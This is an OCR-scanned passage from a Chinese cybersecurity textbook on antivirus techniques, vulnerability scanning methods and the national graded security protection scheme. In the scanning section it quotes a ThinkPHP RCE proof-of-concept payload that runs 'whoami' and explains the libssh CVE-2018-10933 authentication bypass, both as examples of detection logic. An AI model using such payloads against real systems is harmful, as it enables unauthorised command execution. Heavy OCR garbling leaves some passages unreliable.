对 抗 的 病毒 有 更 好 的 检测 能 力 , 同 时 具有 查 杀 未 知 病毒 的 能 力 。 

@ 基于 云 技术 的 云 查 杀 技 术 。 云 查 杀 技术 是 随 着 互联 网 的 发 展 以 及 云 存储 、 云 计算 
等 技术 的 发 展 而 出 现 的 。 将 这 些 云 技术 与 原 有 的 病毒 检测 技术 结合 应 用 , 反 病 毒 技术 实 
现 了 一 次 较 大 的 飞跃 。 同 时 ,基于 云 查 杀 的 诸多 优点 , 反 病毒 也 很 好 地 应 对 了 互联 网 环境 
下 出 现 的 病毒 快速 产生 和 传播 的 挑战 。 云 查 杀 技术 的 基本 原理 是 将 “匹配 "和 “基准 ” 放 在 
云端 进行 ,比较 常见 的 一 种 实现 方式 是 以 文件 哈 希 值 为 采样 数据 和 基准 ,客户 端 获 取 文件 
哈 希 值 , 然 后 上 传 到 云端 进行 比较 并 返回 结果 。 云 查 杀 技术 相 比 于 以 前 的 检测 技术 ,具有 
明显 的 优点 : 

。 一 是 反应 速度 快 。 由 于 病毒 库存 放 于 云端 ,因此 终端 不 再 需要 定时 更 新 本 地 病毒 

库 。 当 新 的 病毒 特征 一 旦 在 云端 入 库 , 以 后 的 客户 端 查询 匹配 就 可 以 获取 使 用 ， 
这 个 更 新 是 瞬间 的 。 反 病毒 软件 通过 在 捕获 ,处 理 和 库 更 新 上 的 速度 大 幅 提高 ， 
可 以 极 大 缩小 病毒 的 存活 周期 ,减少 病毒 的 危害 。 

。 二 是 终端 资源 使 用 大 大 减 小 。 因 为 不 使 用 本 地 病毒 库 , 就 大 大 减少 了 使 用 云 查 杀 

技术 的 反 病毒 软件 在 终端 上 的 硬盘 和 内 存 资源 的 使 用 ,提高 了 运行 效率 。 

@ 基于 大 数据 处 理 与 人 工 智能 学 习 算 法 的 智能 查 杀 技 术 。 随 着 大 数据 与 人 工 智 能 
技术 的 发 展 以 及 病毒 数量 的 海量 增长 ,这 些 技术 也 被 应 用 到 病毒 检测 之 中 。 通 过 应 用 人 
工 智能 学 习 算 法 ,对 已 知 海量 病毒 样本 的 学 习 , 可 以 获取 对 病毒 的 算法 模型 ,从 而 根据 模 
型 匹配 已 知 与 未 知 的 病毒 。 这 种 基于 人 工 智 能 学 习 算 法 的 病毒 检测 方法 相 较 于 其 他 检测 
方法 ,在 应 对 未 知 病毒 上 具有 极 大 优势 。 


3.2.5 安全 漏洞 扫描 技术 
1. 漏洞 扫描 技术 概述 
漏洞 扫描 作为 一 种 网 络 安全 防护 技术 ,其 目的 是 防 患 于 未 然 。 在 安全 风险 被 黑客 发 
现 和 利用 之 前 ,由 系统 维护 人 员 先 行 识别 ,对 识别 结果 进行 量化 评定 ,依据 结果 对 漏洞 隐 
患 实施 有 针对 性 的 防护 或 修补 ,进而 有 效 降低 或 清除 系统 (或 应 用 ) 的 安全 风险 。 按 照 
FAIR(Factor Analysis of Information Risk) 方 法 ,安全 风险 在 一 级 层次 可 分 解 为 价值 资 
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产 、 脆 弱 性 和 攻击 威胁 3 个 维度 ,这 些 维度 的 核心 在 于 脆弱 性 即 漏洞 ,整个 风险 管理 围绕 
着 漏洞 展开 ,可 以 说 没有 漏洞 就 没有 风险 ,风险 量化 的 关键 在 于 漏洞 扫描 和 识别 。 
漏洞 按照 被 公布 时 间 的 不 同 阶段 ,可 分 为 ， 
* 1 Day 漏洞 : 被 发 现 并 且 公 布 的 最 新 漏洞 ;1 Day 代表 最 新 公布 的 ,取决 于 发 布 路 
径 和 传播 速度 ,实际 上 不 一 定 是 一 天 。 
。 N Day 漏洞 : 被 公布 的 历史 漏洞 ;N Day 表示 距离 公布 已 经 过 了 N 天 ,显然 NI. 
* 0 Day 漏洞 : 未 被 公开 的 漏洞 ;0 是 相对 于 1 而 言 , 实 际 上 0 Day 漏洞 已 经 被 发 现 
了 ,只 是 没有 公开 ,对 公众 仍然 处 于 隐藏 状态 。 

全 球 范围 内 , 随 着 计算 机 信息 系统 应 用 普及 和 网 络 基础 设施 的 建设 ,各 类 漏洞 规模 急 
剧 扩充 ,为 了 有 效 地 量化 管理 ,国际 上 不 同 组 织 提 出 了 各 类 漏洞 管理 标准 ,国外 如 
MITRE CVE,CWE.NIST NVD,Symantec BUGTRAQ 等 ,国内 如 中 国信 息 安 全 测评 中 
心 维护 的 CNNVD 国家 漏洞 库 , 国 家 互联 网 应 急 中 心 CNCERT 维护 的 CNCVE,CNVD 
等 。 各 组 织 按 自身 目的 所 关注 漏洞 范围 的 不 同 ,组 织 建设 收集 并 发 布 各 自 的 漏洞 库 , 但 是 
这 些 漏洞 库 也 存在 着 部 分 交 秋 覆盖。 其 中 ,以 美国 政府 背景 MITRE 的 CVE 标准 最 具 代 
表 性 ,其 收录 漏洞 最 早 .范围 最 全 ,截至 2020 年 中 期 ,该 漏洞 库 已 经 收录 13 万 条 漏洞 。 

漏洞 扫描 即 针对 通用 漏洞 的 检测 ,需要 依据 通用 漏洞 的 形成 原理 和 其 造成 的 外 部 表 
现 来 判断 。 是 否 可 以 被 检测 ,取决 于 形成 漏洞 的 安全 缺陷 机 制 。 并 非 所 有 的 漏洞 都 可 被 
准确 无 误 地 识别 。 漏 洞 扫 描 的 具体 实施 效果 一 般 依赖 于 如 下 几 方 面 因 素 : 

(D 漏洞 PoC(Proof of Concept) 是 否 公 开 。PoC 是 通用 漏洞 存在 的 原理 证 明 。 漏 洞 
标准 组 织 收录 漏洞 时 需要 关联 厂商 核实 提供 。 由 于 安全 影响 可 能 较 大 ,标准 组 织 公布 漏 
洞 后 一 般 不 会 发 布 PoC。 外 界 得 到 的 PoC 是 通过 安全 行业 内 的 个 人 或 组 织 非 正 式 提供 。 
代码 形式 的 PoC 中 会 存在 一 段 二 进 制 或 其 他 格式 的 漏洞 外 部 检测 特征 码 , 称 为 payload, 
具有 PoC 甚至 payload 的 漏洞 ,易于 被 外 部 精准 识别 。 

@ 系统 指纹 信息 采集 准确 度 。PoC 依赖 于 漏洞 的 形成 机 理 , 并 非 所 有 漏洞 都 具有 
PoC ,但 是 所 有 标准 组 织 收录 的 通用 漏洞 都 会 记录 漏洞 存在 的 系统 或 应 用 类 型 和 版 本 。 
一 般 系统 或 应 用 在 修复 特定 漏洞 后 ,会 更 新 其 版 本 号 。 因 此 只 要 具有 标准 漏洞 库 的 数据 ， 
原则 上 只 要 识别 出 待 检测 目标 系统 或 应 用 的 类 型 .版 本 ,就 可 判断 相关 的 漏洞 是 否 存在 。 

@ 漏洞 EXP(EXPloit) 是 否 存在 。EXP 是 指 按照 通用 漏洞 的 缺陷 原理 ,针对 相应 漏 
洞 实例 加 以 利用 。EXP 不 同 于 PoC,PoC 重 于 检测 和 识别 ,而 基于 EXP 可 构建 针对 特定 
漏洞 的 攻击 工具 。 从 安全 风险 构成 角度 ,具有 EXP 的 漏洞 往往 风险 程度 极 高 ,是 黑客 重 
点 关注 的 对 象 。 从 漏洞 扫描 角度 .有 了 EXP, 在 漏洞 被 检 出 后 ,可 以 附加 执行 漏洞 验证 的 
环节 , 即 通过 对 应 的 EXP 进行 漏洞 利用 和 数据 取证 ,从 原理 上 核实 漏洞 的 存在 。 但 是 
EXP 会 使 漏洞 造成 实质 性 的 风险 事件 发 生 , 具 有 高 度 的 敏感 性 。 

随 着 信息 领域 技术 的 快速 发 展 , 各 类 漏洞 标准 组 织 收录 的 漏洞 规模 不 断 扩张 , 面 对 规 
模 稍 大 一 些 的 漏洞 范围 ,使 用 传统 手动 方式 逐个 分 析 已 不 适合 ,因此 各 类 漏洞 检测 仪器 应 
运 而 生 , 这 些 仪 器 称 为 扫描 器 。 扫 描 器 以 扫描 任务 的 形式 ,封装 检测 目标 空间 ,应 用 漏洞 
标准 和 范围 ,使 用 不 同 的 检测 技术 手段 ,通过 时 间 调 度 策 略 ,最 终结 果 以 报表 形式 呈现 , 完 
成 对 扫描 目标 的 漏洞 风险 评估 。 扫 描 器 支持 自动 化 方式 执行 大 规模 的 漏洞 识别 , 端 到 端 
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检测 业务 和 报表 输出 ,提供 结果 的 风险 分 析 , 支 持 升级 漏洞 库 等 功能 。 


2. 漏洞 扫描 技术 分 类 

从 整体 上 ,按照 漏洞 扫描 的 目标 对 象 类 型 ,将 漏洞 扫描 技术 划分 为 两 大 类 ,分 别 采 用 
差异 化 的 扫描 技术 。 

(1) 系统 扫描 

扫描 目标 是 已 规模 化 发 布 的 系统 、 应 用 软件 或 者 设备 。 常 见 的 扫描 目标 如 下 : 

CD 操作 系统 : Windows 系列 : Microsoft Windows 10, Microsoft Windows 2000 
Server 等 ; Mac 系列 : Apple iOS 5.0, Apple iOS 6, Apple iOS 10, Apple Mac OS X 
Server ^5; Linux 系列 : Android, OpenWrt, Linux fy?f£ VJ Ez, uClinux, Gentoo, Xiaomi 
MiWiFi,Huawei EchoLife 等 。 

Q 网 络 设 备 : Cisco 各 类 设备 .华为 .3com 各 类 通信 设备 tp-link 各 类 设备 等 。 

@ 协议 /端口 : ftp/21、http/80、https/443 ,telnet/23、ssh/22、smtp/25、pop3/110、 
rdp/3389 ,smb/445 ,snmp/161 等 。 

@ 服务 应 用 : Apache, Tomcat , Nginx, MS SQL Server, MySQL, Oracle, PostgreSQL、 
VMware Workstation, OpenSSH , Samba, ThinkPHP Java ,iTunes, Chrome 等 。 

HA EOGE S FE s 8 ati TEC «JC 2E S f di e I VE RE ,因而 可 以 用 漏洞 库 标 准 作 
为 检测 结果 标识 的 依据 ,例如 前 文 所 述 的 CVE、CNNVD 等 漏洞 库 ,收录 的 均 为 系统 扫描 
领域 的 通用 漏洞 。 基 于 通用 漏洞 库 , 相 关 的 漏洞 挖掘 .引用 、 检 测 和 修复 等 形成 了 完整 的 
生态 环境 ,导致 该 领域 的 扫描 技术 相对 比较 规范 和 成 熟 。 系 统 扫 描 技 术 分 为 两 类 ， 

CD 原理 检测 : 即使 用 漏洞 相关 的 POC 机 制 原理 ,数据 和 代码 ,转换 为 漏洞 检测 工具 
或 插件 ,模拟 和 重 现 漏洞 的 触发 过 程 。 原 理 检 测 也 常 被 称 为 精确 扫描 。 

@ 版 本 检测 : 系统 扫描 的 版 本 检测 就 是 通过 解析 到 该 应 用 系统 的 版 本 信息 ,存储 获 
取 的 该 应 用 系统 的 版 本 信息 ,进而 再 将 存储 的 版 本 信息 跟 已 知 漏洞 的 受 影响 的 版 本 信息 
做 对 比 ,最 终 上 报 相 关 漏 洞 信 息 。 

(2) 应 用 扫描 

应 用 扫描 技术 采用 缺陷 类 型 原理 检测 。 按 照 不 同类 型 安全 缺陷 的 原理 ,首先 构建 缺 
陷 场景 , 自 定义 漏洞 ,再 通过 场景 要 求 , 利 用 外 部 协议 控制 对 应 用 程序 的 输入 参数 ,获取 应 
用 返回 结果 后 与 缺陷 预期 结果 比较 ,判断 漏洞 是 否 存 在 。 它 的 扫描 目标 是 各 种 应 用 ,以 
Web 应 用 较 多 。 常 见 的 扫描 目标 如 下 : 

CD 内 容 管理 系统 (Content Management System. CMS): 包括 用 友 .通达 OA、 大汉、 
Ta /R 8. , Discuz, WordPress, Joomla, Drupal, PhpCMS, DedeCMS, 74CMS, KindEditor, 
eWebEditor, FCKEditor, UEditor 等 多 种 CMS, 

@ 服务 器 : Apache IIS Tomcat, Weblogic, WebSphere 等 。 

G 框架 : Struts2、Spring、jQuery 等 。 

此 类 漏洞 产生 的 原因 主要 是 因为 这 些 目标 的 不 当 应 用 而 产生 的 ,因此 通用 性 较 低 , 缺 
少 漏洞 库 标 准 的 支持 。 专 门 覆 盖 Web 应 用 漏洞 扫描 的 规范 组 织 是 OWASP(Open Web 
Application Security Project) fll WASCCWeb Application Security Consortium) 。 前 者 每 
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两 到 三 年 发 布 当 时 最 为 重要 的 Web 安全 缺陷 类 型 ,近期 随 着 移动 终端 的 普及 还 增加 了 终 
端 应 用 的 安全 缺陷 类 型 (OWASP Mobile) 。 常 见 的 Web 漏洞 如 表 3-7 所 示 。 


表 3-7 NIST 2019 CWE TOP10 安全 缺陷 


安全 缺陷 d 述 
缓冲 区 越界 软件 读 写 地 址 超越 了 设计 预期 的 边界 ,可 能 导致 任意 代码 执行 或 者 程序 崩溃 
跨 站 脚本 网 站 应 用 未 能 合理 处 置 用 户 输 入 ,导致 输入 直接 联动 了 为 其 他 用 户 服务 的 页 面 
不 适当 输入 校 验 | 应 用 对 外 部 输入 使 用 了 不 适当 的 校 验 ,通过 参数 能 够 影响 程序 控制 流 或 数据 流 
敏感 信息 泄露 。 | 应 用 对 未 授权 用 户 暴露 了 内 部 敏感 数据 
越界 访问 程序 读 取 数据 时 超越 了 预期 的 起 止 边界 ,是 缓冲 区 越界 的 子 类 型 
SQL 注 人 对 外 部 可 控 输 入 使 用 了 不 适当 的 校 验 , 导 致 能 够 组 装 内 部 的 SQL 语句 
释放 后 使 用 内 存 变量 释放 后 继续 访问 ,导致 程序 崩溃 或 者 访问 到 不 期 望 地 址 
整数 溢出 程序 中 对 整数 的 计算 未 加 有 效 判断 ,导致 结果 溢出 或 者 循环 和 覆盖 
CSRF 跨 站 网 站 应 用 不 能 有 效 识别 和 判断 不 同 身份 的 用 户 请 求 
Bit ei Ug 应 用 对 外 部 索引 内 部 资源 的 输入 参数 未 能 合理 限制 ,导致 索引 到 未 授权 资源 


按照 漏洞 扫描 的 目标 对 象 类 型 维度 划分 ,漏洞 扫描 技术 总 结 如 图 3-24 所 示 。 


CNNVD 系统 指纹 库 | | PCIDSS 
1 CWE 
1 
CVE CPE 1 OWASP WASC 
数据 依赖 d | | 数据 依 帧 “了 
ERU jJ. EWPEEL-LI----Q4----J.FWEERD.-------. 
1 1 1 zx 
POC 原 理 检测 
ERES mot | | 缺陷 原理 检测 
| 
系统 扫描 | 应 用 扫描 
漏洞 扫描 技术 


图 3-24 漏洞 扫描 基础 技术 分 类 


以 上 是 漏洞 扫描 领域 技术 的 基础 划分 维度 ,此 外 比较 常用 的 还 有 从 扫描 技术 执行 形 
式 的 维度 分 类 ,例如 ,安全 领域 国际 咨询 机 构 GARTNER 对 应 用 领域 的 漏洞 扫描 技术 做 
了 类 别 的 划分 ,说 明 如 下 : 

(D 黑 盒 扫描 : 即 动态 应 用 程序 安全 测试 (Dynamic Application Security Testing. 
DAST) , 它 整 体 上 将 扫描 对 象 看 成 黑 盒 ,不 改变 和 深入 其 内 部 , 仅 从 其 外 部 正常 工作 流程 
中 识别 漏洞 或 者 缺陷 。 

Q 交互 式 扫 描 : 即 交 互 式 应 用 程序 安全 测试 (Interactive Application Security 
Testing,IAST) , 它 通 过 在 被 扫描 目标 内 部 植 和 人 扫描 代理 的 方式 ,在 扫描 过 程 中 与 外 部 扫 
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描 设 备 实现 互动 ,扫描 设备 通过 改变 输入 参数 触发 对 象 的 内 部 工作 流程 ,执行 模拟 攻击 场 
景 , 扫 描 代 理 在 内 部 随 流程 监控 被 扫描 对 象 的 状态 ,并 给 予 外 部 反馈 。 由 于 植 和 人 到 扫描 对 
象 的 内 部 ,交互 式 扫描 具有 较 高 的 精度 , 且 能 够 定位 导致 漏洞 的 缺陷 所 在 。 

@ 白 盒 扫描 : 即 静 态 应 用 程序 安全 测试 (Static Application Security Testing. 
SAST), 它 采取 代码 审计 方式 ,获取 对 象 的 源 代码 二 进 制 文件 等 , 按 编译 器 前 端 模式 执 
行 代 码 的 词法 .语法 和 语义 分 析 , 获 取代 码 的 数据 流 、 控 制 流 、 调 用 栈 等 结构 图 ,结合 各 种 
缺陷 类 型 的 原理 规则 ,对 可 能 导致 漏洞 的 缺陷 作出 判断 。SAST 不 仅 能 够 扫描 漏洞 ,还 有 
代码 质量 评估 、 编 码 规范 符合 度 审 查 等 功能 。 


3. 漏洞 扫描 原理 简介 
本 节 以 系统 扫描 为 主 , 说 明 漏 洞 扫 描 的 基本 过 程 和 重点 技术 。 在 漏洞 扫描 过 程 中 ,对 
单独 漏洞 的 检测 功能 被 封装 为 插件 。 插 件 实现 的 形式 不 限 ,一般 采用 解释 器 设计 模式 的 
脚本 形式 。 以 下 主要 介绍 漏洞 扫描 的 工作 过 程 。 
漏洞 扫描 分 为 如 下 步骤 ， 
C 存活 判断 : 在 进行 系统 漏洞 扫描 时 ,输入 的 目标 对 象 一 般 是 网 络 空间 范围 。 为 保 
证 扫描 效率 ,启动 扫描 任务 前 会 首先 探测 目标 系统 是 否 存 活 。 主 机 存活 性 探测 技术 包括 
三 种 指令 : ICMP Ping, UDP Ping, TCP/ACK Ping. 
Q) 端口 扫描 : 对 已 经 存活 的 主机 ,需要 探测 主机 上 开启 了 哪些 端口 。 对 于 端口 的 探 
测 ,主要 采用 TCP 连接 的 方式 进行 探测 。 包 括 完整 的 TCP 连接 、TCP 半 连 接 (TCP 
SYN) , 非 标准 端口 服务 指纹 识别 。 
@ 系统 和 服务 识别 : 在 进行 操作 系统 版 本 识别 时 ,需要 根据 各 个 操作 系统 在 底层 协 
议 栈 实 现 上 的 不 同 特点 ,采用 黑 盒 测试 方法 ,通过 研究 其 对 各 种 探测 的 响应 形成 识别 指 
纹 , 进 而 识别 目标 主机 运行 的 操作 系统 。 其 使 用 的 采集 技术 主要 包括 : 
。 被 动 识别 : 通过 流量 侦 听 ,对 数据 包 的 不 同 指纹 特征 (TCP Window-size, IP 
TTL,IP TOS,DF 位 等 参数 ) 进 行 分 析 ,来 识别 操作 系统 。 
。 主动 识别 : 通过 发 特殊 构造 的 包 , 从 目标 主机 的 应 答 指 纹 来 识别 操作 系统 。 例 
如 ,如 果 发 送 一 个 FIN/PSH/URG 报 文 到 一 个 关闭 的 TCP 端口 ,大 多 数 操作 系 
统 会 设置 ACK 为 接收 报 文 的 初始 序列 数 , 而 Windows 会 设置 ACK 为 接收 报 文 
的 初始 序列 数 加 1。 基 于 这 一 特点 ,在 发 现 操作 系统 反馈 ACK 为 初始 序列 数 加 1 
时 ,可 以 识别 目标 操作 系统 为 Windows 操作 系统 。 
应 用 服务 版 本 识别 主要 依靠 应 用 服务 反馈 的 业务 层 数 据 指纹 ,如 Banner 信息 等 。 
CD 漏洞 检测 : 完成 主机 存活 发 现 、 端 口 发 现 、 系 统 和 服务 识别 后 ,扫描 器 会 根据 识别 
的 系统 与 服务 信息 调用 内 置 或 用 户外 挂 的 口令 字典 ,对 目标 系统 进行 口令 猜测 ,口令 猜测 
成 功 后 将 启动 授权 登录 扫描 ,并 在 开始 口令 猜测 的 同时 启动 远程 非 登 录 漏洞 扫描 。 漏 洞 
检测 过 程 将 按 不 同 的 资源 分 配 策略 调用 任务 参数 中 配置 漏洞 范围 对 应 的 插件 ,如 图 3-25 
所 示 。 
漏洞 检测 可 分 为 两 类 : 
。 原 理 检 测 。 原 理 检 测 一 般 也 称 为 精确 扫描 或 POC 检测 。 该 检测 方式 是 对 目标 机 
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的 相关 端口 发 送 请 求 构 造 的 特殊 数据 包 。 进 而 根据 返回 的 结果 信息 ,来 判断 漏洞 
是 否 存在 。 一 般 情 况 下 ,原理 检测 出 来 的 漏洞 ,准确 度 很 高 ,几乎 没有 误 报 。 
例如 ,检测 ThinkPHP 的 RCE(Remote Command Execution) 漏 洞 , 假 设 日 标 环境 
ThinkPHP 的 地 址 url 为 


http://ip:port/thinkphp/thinkphp 5.0.22 with extend/public/index.php? s-captcha 
检测 插件 以 post 方式 向 该 url 地 址 发 送 请 求 ,构造 的 特殊 请 求 为 


paylod- method- . construct&filter[ ]- system&method- get&server[ REQUEST _ 
METHOD]- whoami 


如 果 执 行 结 果 跟 目标 机 上 执行 whoami 命令 的 结果 一 致 ,说 明 漏洞 存在 。 有 具体 检测 中 以 
上 url 是 不 固定 的 ,需要 根据 实际 环境 而 定 。 
再 如 ,CVE-2018-10933 身份 验证 绕 过 漏洞 。 检 测 方式 是 通过 向 SSH 服务 端 直接 发 
送 SSH2 MSG USERAUTH SUCCESS 消息 来 代替 服务 端 期 望 启动 身份 验证 的 SSH2 
.MSG USERAUTH REQUEST 消息 , 即 可 在 没有 任何 认证 凭据 的 情况 下 成 功 进行 身 
份 验证 ,从 而 以 SSH 登录 到 服务 端的 主机 上 执行 命令 等 操作 。 
针对 某 一 个 漏洞 的 原理 检测 方式 并 不 唯一 。 不 同 的 漏洞 挖掘 研究 人 员 , 面 对 同 一 个 
漏洞 会 写 出 不 同 的 原理 检测 方式 。 
。 版 本 检测 。 系 统 扫描 是 依照 漏洞 库 标准 实施 的 ,在 标准 的 漏洞 说 明 中 ,会 详细 说 
明 该 漏洞 所 在 系统 的 身份 信息 ,例如 CPE 标识 的 系统 类 型 和 详细 版 本 号 。 此 外 
按照 惯例 ,系统 的 升级 一 般 会 更 改版 本 号 ,因此 在 漏洞 与 系统 版 本 之 间 就 存在 了 
例如 ,检测 Apache Tomcat 安全 漏洞 (CVE-2020-9484) ,漏洞 库 条 目 中 受到 影响 的 版 
本 : Apache Tomcat 10.0.0-M1 版 本 至 10.0.0-M4 版 本 ,9.0.0.0.M1 版 本 至 9.0.34 版 本 ， 
8.5.0 版 本 至 8.5.54 版 本 ,7.0.0 版 本 至 7.0.103 版 本 。 
如 果 通 过 登录 扫描 或 是 其 他 扫描 方式 获取 到 目标 机 上 的 tomcat 版 本 是 9.0.32 ,那么 
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就 能 证 明 目 标 机 上 的 tomcat 存在 漏洞 CVE-2020-9484, 

版 本 检测 的 关键 在 于 有 效 识别 目标 对 象 的 类 型 和 详细 版 本 号 ,这 里 就 需要 用 到 系统 
指纹 识别 技术 。 指 纹 作为 扫描 对 象 的 外 在 数据 特征 ,配合 指纹 规则 或 者 指纹 模型 ,就 能 够 
指向 对 象 的 标记 , 即 类 型 .厂商 和 细致 版 本 号 等 ,如 CPE 标准 的 规定 。 

执行 版 本 检测 的 必要 条 件 是 具备 系统 指纹 库 , 即 各 类 系统 指纹 和 其 关联 标记 构成 的 
数据 库 ,指纹 库 的 完备 和 细致 是 影响 系统 扫描 版 本 检测 的 重要 因素 。 

按照 对 扫描 目标 的 影响 ,漏洞 检测 也 可 以 分 为 有 损 检测 和 无 损 检测 。 有 损 检测 插件 
在 扫描 目标 系统 中 是 否 存 在 漏洞 时 ,会 影响 目标 系统 的 正常 运行 ,这 种 插件 的 原理 就 是 通 
过 构造 特殊 包 , 造 成 目标 系统 异常 ,进而 证 明 目 标 系 统 存 在 相应 的 漏洞 。 例 如 拒绝 服务 攻 
击 漏洞 (DDOS) 的 一 些 验证 模式 ,就 是 向 目标 服务 器 发 送 特 殊 请 求 包 , 造 成 服务 异常 ,无 
法 提供 正常 服务 。 无 损 检测 是 指 扫描 插件 在 检测 过 程 中 ,对 目标 系统 正常 运行 无 任何 影 
响 。 实 际 扫描 检测 中 ,以 无 损 扫描 为 主要 方式 。 
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3.3.1 ”安全 等 级 保护 


1. 等 级 保护 概述 

《网 络 安全 法 ) 第 二 十 一 条 规定 ,国家 实行 网 络 安 全 等 级 保护 制度 。 该 制度 的 核心 是 
对 网 络 实施 分 等 级 保护 和 分 等 级 监管 。 这 项 制度 体现 了 风险 管理 的 思想 , 即 安全 保护 措 
施 应 当 针 对 威胁 和 风险 ,成 本 投入 应 当 与 收益 相符 , 既 不 能 欠 保 护 ,也 不 能 过 保护 。2003 
年 《国家 信息 化 领导 小 组 关于 加 强 信息 安全 保障 工作 的 意见 》 在 部 署 等 级 保护 工作 时 指 
出 :“ 信 息 化 发 展 的 不 同 阶段 和 不 同 的 信息 系统 有 着 不 同 的 安全 需求 ,必须 从 实际 出 发 ， 
综合 平衡 安全 成 本 和 风险 ,优化 信息 安全 资源 的 配置 ,确保 重点 。 要 重点 保护 基础 信息 网 
络 和 关系 国家 安全 经济 命脉 .社会 稳定 等 方面 的 重要 信息 系统 ,抓紧 建立 信息 安全 等 级 
保护 制度 ,制定 信息 安全 等 级 保护 的 管理 办 法 和 技术 指南 。” 

(1) 等 级 划分 

根据 网 络 在 国家 安全 、 经 济 建设 .社会 生活 中 的 重要 程度 ,以 及 其 一 旦 遭 到 破坏 .丧失 
功能 或 者 数据 被 算 改 .泄露 .丢失 、 损 毁 后 ,对 国家 安全 、 社 会 秩序 .公共 利益 以 及 相关 公 
民 ,、 法 人 和 其 他 组 织 的 合法 权益 的 危害 程度 等 因素 ,网络 分 为 五 个 安全 保护 等 级 。 

(D 第 一 级 : 一 旦 受到 破坏 会 对 相关 公民 、 法 人 和 其 他 组 织 的 合法 权益 造成 损害 ,但 
不 危害 国家 安全 、 社 会 秩序 和 公共 利益 的 一 般 网 络 。 

@ 第 二 级 : 一 旦 受到 破坏 会 对 相关 公民 、 法 人 和 其 他 组 织 的 合法 权益 造成 严重 损 
害 , 或 者 对 社会 秩序 和 公共 利益 造成 危害 ,但 不 危害 国家 安全 的 一 般 网 络 。 

Q 第 三 级 : 一 旦 受到 破坏 会 对 相关 公民 、 法 人 和 其 他 组 织 的 合法 权益 造成 特别 严重 
损害 ,或 者 会 对 社会 秩序 和 社会 公共 利益 造成 严重 危害 ,或 者 对 国家 安全 造成 危害 的 重要 
网 络 。 

CD 第 四 级 : 一 旦 受到 破坏 会 对 社会 秩序 和 公共 利益 造成 特别 严重 危害 ,或 者 对 国家 
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安全 造成 严重 危害 的 特别 重要 网 络 。 

C) 第 五 级 : 一 旦 受到 破坏 后 会 对 国家 安全 造成 特别 严重 危害 的 极其 重要 网 络 。 

(2) 工作 机 制 

等 级 保护 对 象 主要 包括 基础 信息 网 络 、 云 计算 平台 /系统 、 大 数据 应 用 /平台 /资源 、 物 
联网 、 工 业 控 制 系统 和 采用 移动 互联 技术 的 系统 等 。 根 据 其 在 国家 安全 ,经 济 建设 .社会 
生活 中 的 重要 程度 , 遭 到 破坏 后 对 国家 安全 、 社 会 秩序 .公共 利益 以 及 公民 .法 人 和 其 他 组 
织 的 合法 权益 的 危害 程度 等 ,由 低 到 高 划分 为 5 级。 安全 等 级 越 高 ,其 安全 保护 能 力 要 求 
也 就 越 高 ,应 保证 等 级 保护 对 象 具有 相应 等 级 的 安全 保护 能 力 。 第 三 级 及 以 上 的 等 级 保 
护 对 象 是 国家 的 核心 系统 ,是 国家 政治 安全 ,性 土 安 全 和 经 济 安全 之 所 系 。 

等 级 保护 工作 分 为 以 下 5 个 基本 步骤 : 

(D 定 级 : 等 级 保护 对 象 的 运营 、 使 用 单位 按照 等 级 保护 的 管理 规范 和 技术 标准 , 确 
定 其 安全 保护 等 级 。 

@ 备案 : 等 级 保护 对 象 的 运营 、 使 用 单位 按照 相关 管理 规定 报 送 本 地 区 公安 机 关 备 
案 。 跨 地 域 的 等 级 保护 对 象 由 其 主管 部 门 向 其 所 在 地 的 同 级 公安 机 关 进 行 总 备案 ,分 系 
统 分 别 由 当地 运营 、 使 用 单位 向 本 地 地 市 级 公安 机 关 备 案 。 

@ 建设 整改 : 对 已 有 的 等 级 保护 对 象 ,其 运营 ,使 用 单位 根据 已 经 确定 的 安全 保护 
等 级 ,按照 等 级 保护 的 管理 规范 和 技术 标准 ,采购 和 使 用 相应 等 级 的 信息 安全 产品 ,落实 
安全 技术 措施 和 管理 措施 ,完成 系统 整改 。 对 新 建 , 改 建 , 扩 建 的 等 级 保护 对 象 应 当 按 昭 
等 级 保护 的 管理 规范 和 技术 标准 进行 规划 设计 建设 施工 。 

@ 等 级 测评 : 等 级 保护 对 象 的 运营 、 使 用 单位 按照 相应 等 级 的 管理 规范 和 技术 标准 
要 求 , 定 期 进行 安全 状况 检测 评估 ,及 时 消除 安全 隐患 和 漏洞 。 等 级 保护 对 象 的 主管 部 门 
应 当 按 照 等 级 保护 的 管理 规范 和 技术 标准 的 要 求 做 好 监督 管理 工作 。 

C) 监督 检查 ; 公安 机 关 按 照 等 级 保护 的 管理 规范 和 技术 标准 要 求 ,重点 对 第 三 ,第 
四 级 等 级 保护 对 象 的 安全 保护 状况 进行 监督 检查 。 

(3) 相关 法 规 标准 

国家 已 针对 等 级 保护 提出 了 一 系列 的 法 规 标准 ,是 各 单位 开展 等 级 保护 工作 的 依据 。 
1994 年 ,国务院 颁布 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》, 要 求 “ 计 算 机 信息 
系统 实行 安全 等 级 保护 。 安 全 等 级 的 划分 标准 和 安全 等 级 保护 的 具体 办 法 ,由 公安 部 会 
同 有 关 部 门 制定 ”。2006 年 3 月 ,国家 《信息 安全 等 级 保护 管理 办 法 》 正 式 实施 ,明确 了 国 
内 信息 系统 级 别 划分 的 原则 ,并 从 安全 管理 .保密 管理 、 密 码 管理 .法律 责 任 等 方面 作 了 具 
体 规定 。2018 年 6 月 《网 络 安全 等 级 保护 条 例 ( 征 求 意 见 稿 )》 公 开征 求 意 见 ,以 适应 网 
络 安全 新 形势 以 及 新 技术 、 新 应 用 发 展 。 

全 国信 息 安 全 标准 化 技术 委员 会 (TC260) 和 公安 部 信息 系统 安全 标准 化 技术 委员 会 
组 织 制定 了 一 系列 标准 ,为 开展 等 级 保护 工作 提供 了 标准 保障 。 这 些 标准 可 分 为 基础 类 、 
应 用 类 .产品 类 和 其 他 类 。 

GB 17859 一 1999《 计 算 机 信息 系统 安全 保护 等 级 划分 准则 ) 是 强制 性 国家 标准 ,是 其 
他 各 标准 的 基础 。 

GB/T 22239 一 2019《 信 息 安 全 技术 网 络 安全 等 级 保护 基本 要 求 )( 以 下 简称 基本 要 
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求 ) 是 在 (计算 机 信息 系统 安全 保护 等 级 划分 准则 》 以 及 各 技术 类 标准 、 管 理 类 标准 和 产品 
类 标准 基础 上 制定 的 ,从 技术 和 管理 两 个 方面 给 出 了 各 级 等 级 保护 对 象 应 当 具备 的 安全 
防护 能 力 , 是 等 级 保护 对 象 进行 建设 整改 的 安全 需求 。 考 虑 等 级 保护 对 象 的 不 同形 态 , 基 
本 要 求 分 为 安全 通用 要 求 和 安全 扩展 要 求 ( 包 括 云 计 算 安 全 扩展 要 求 .移动 互 联 安全 扩展 
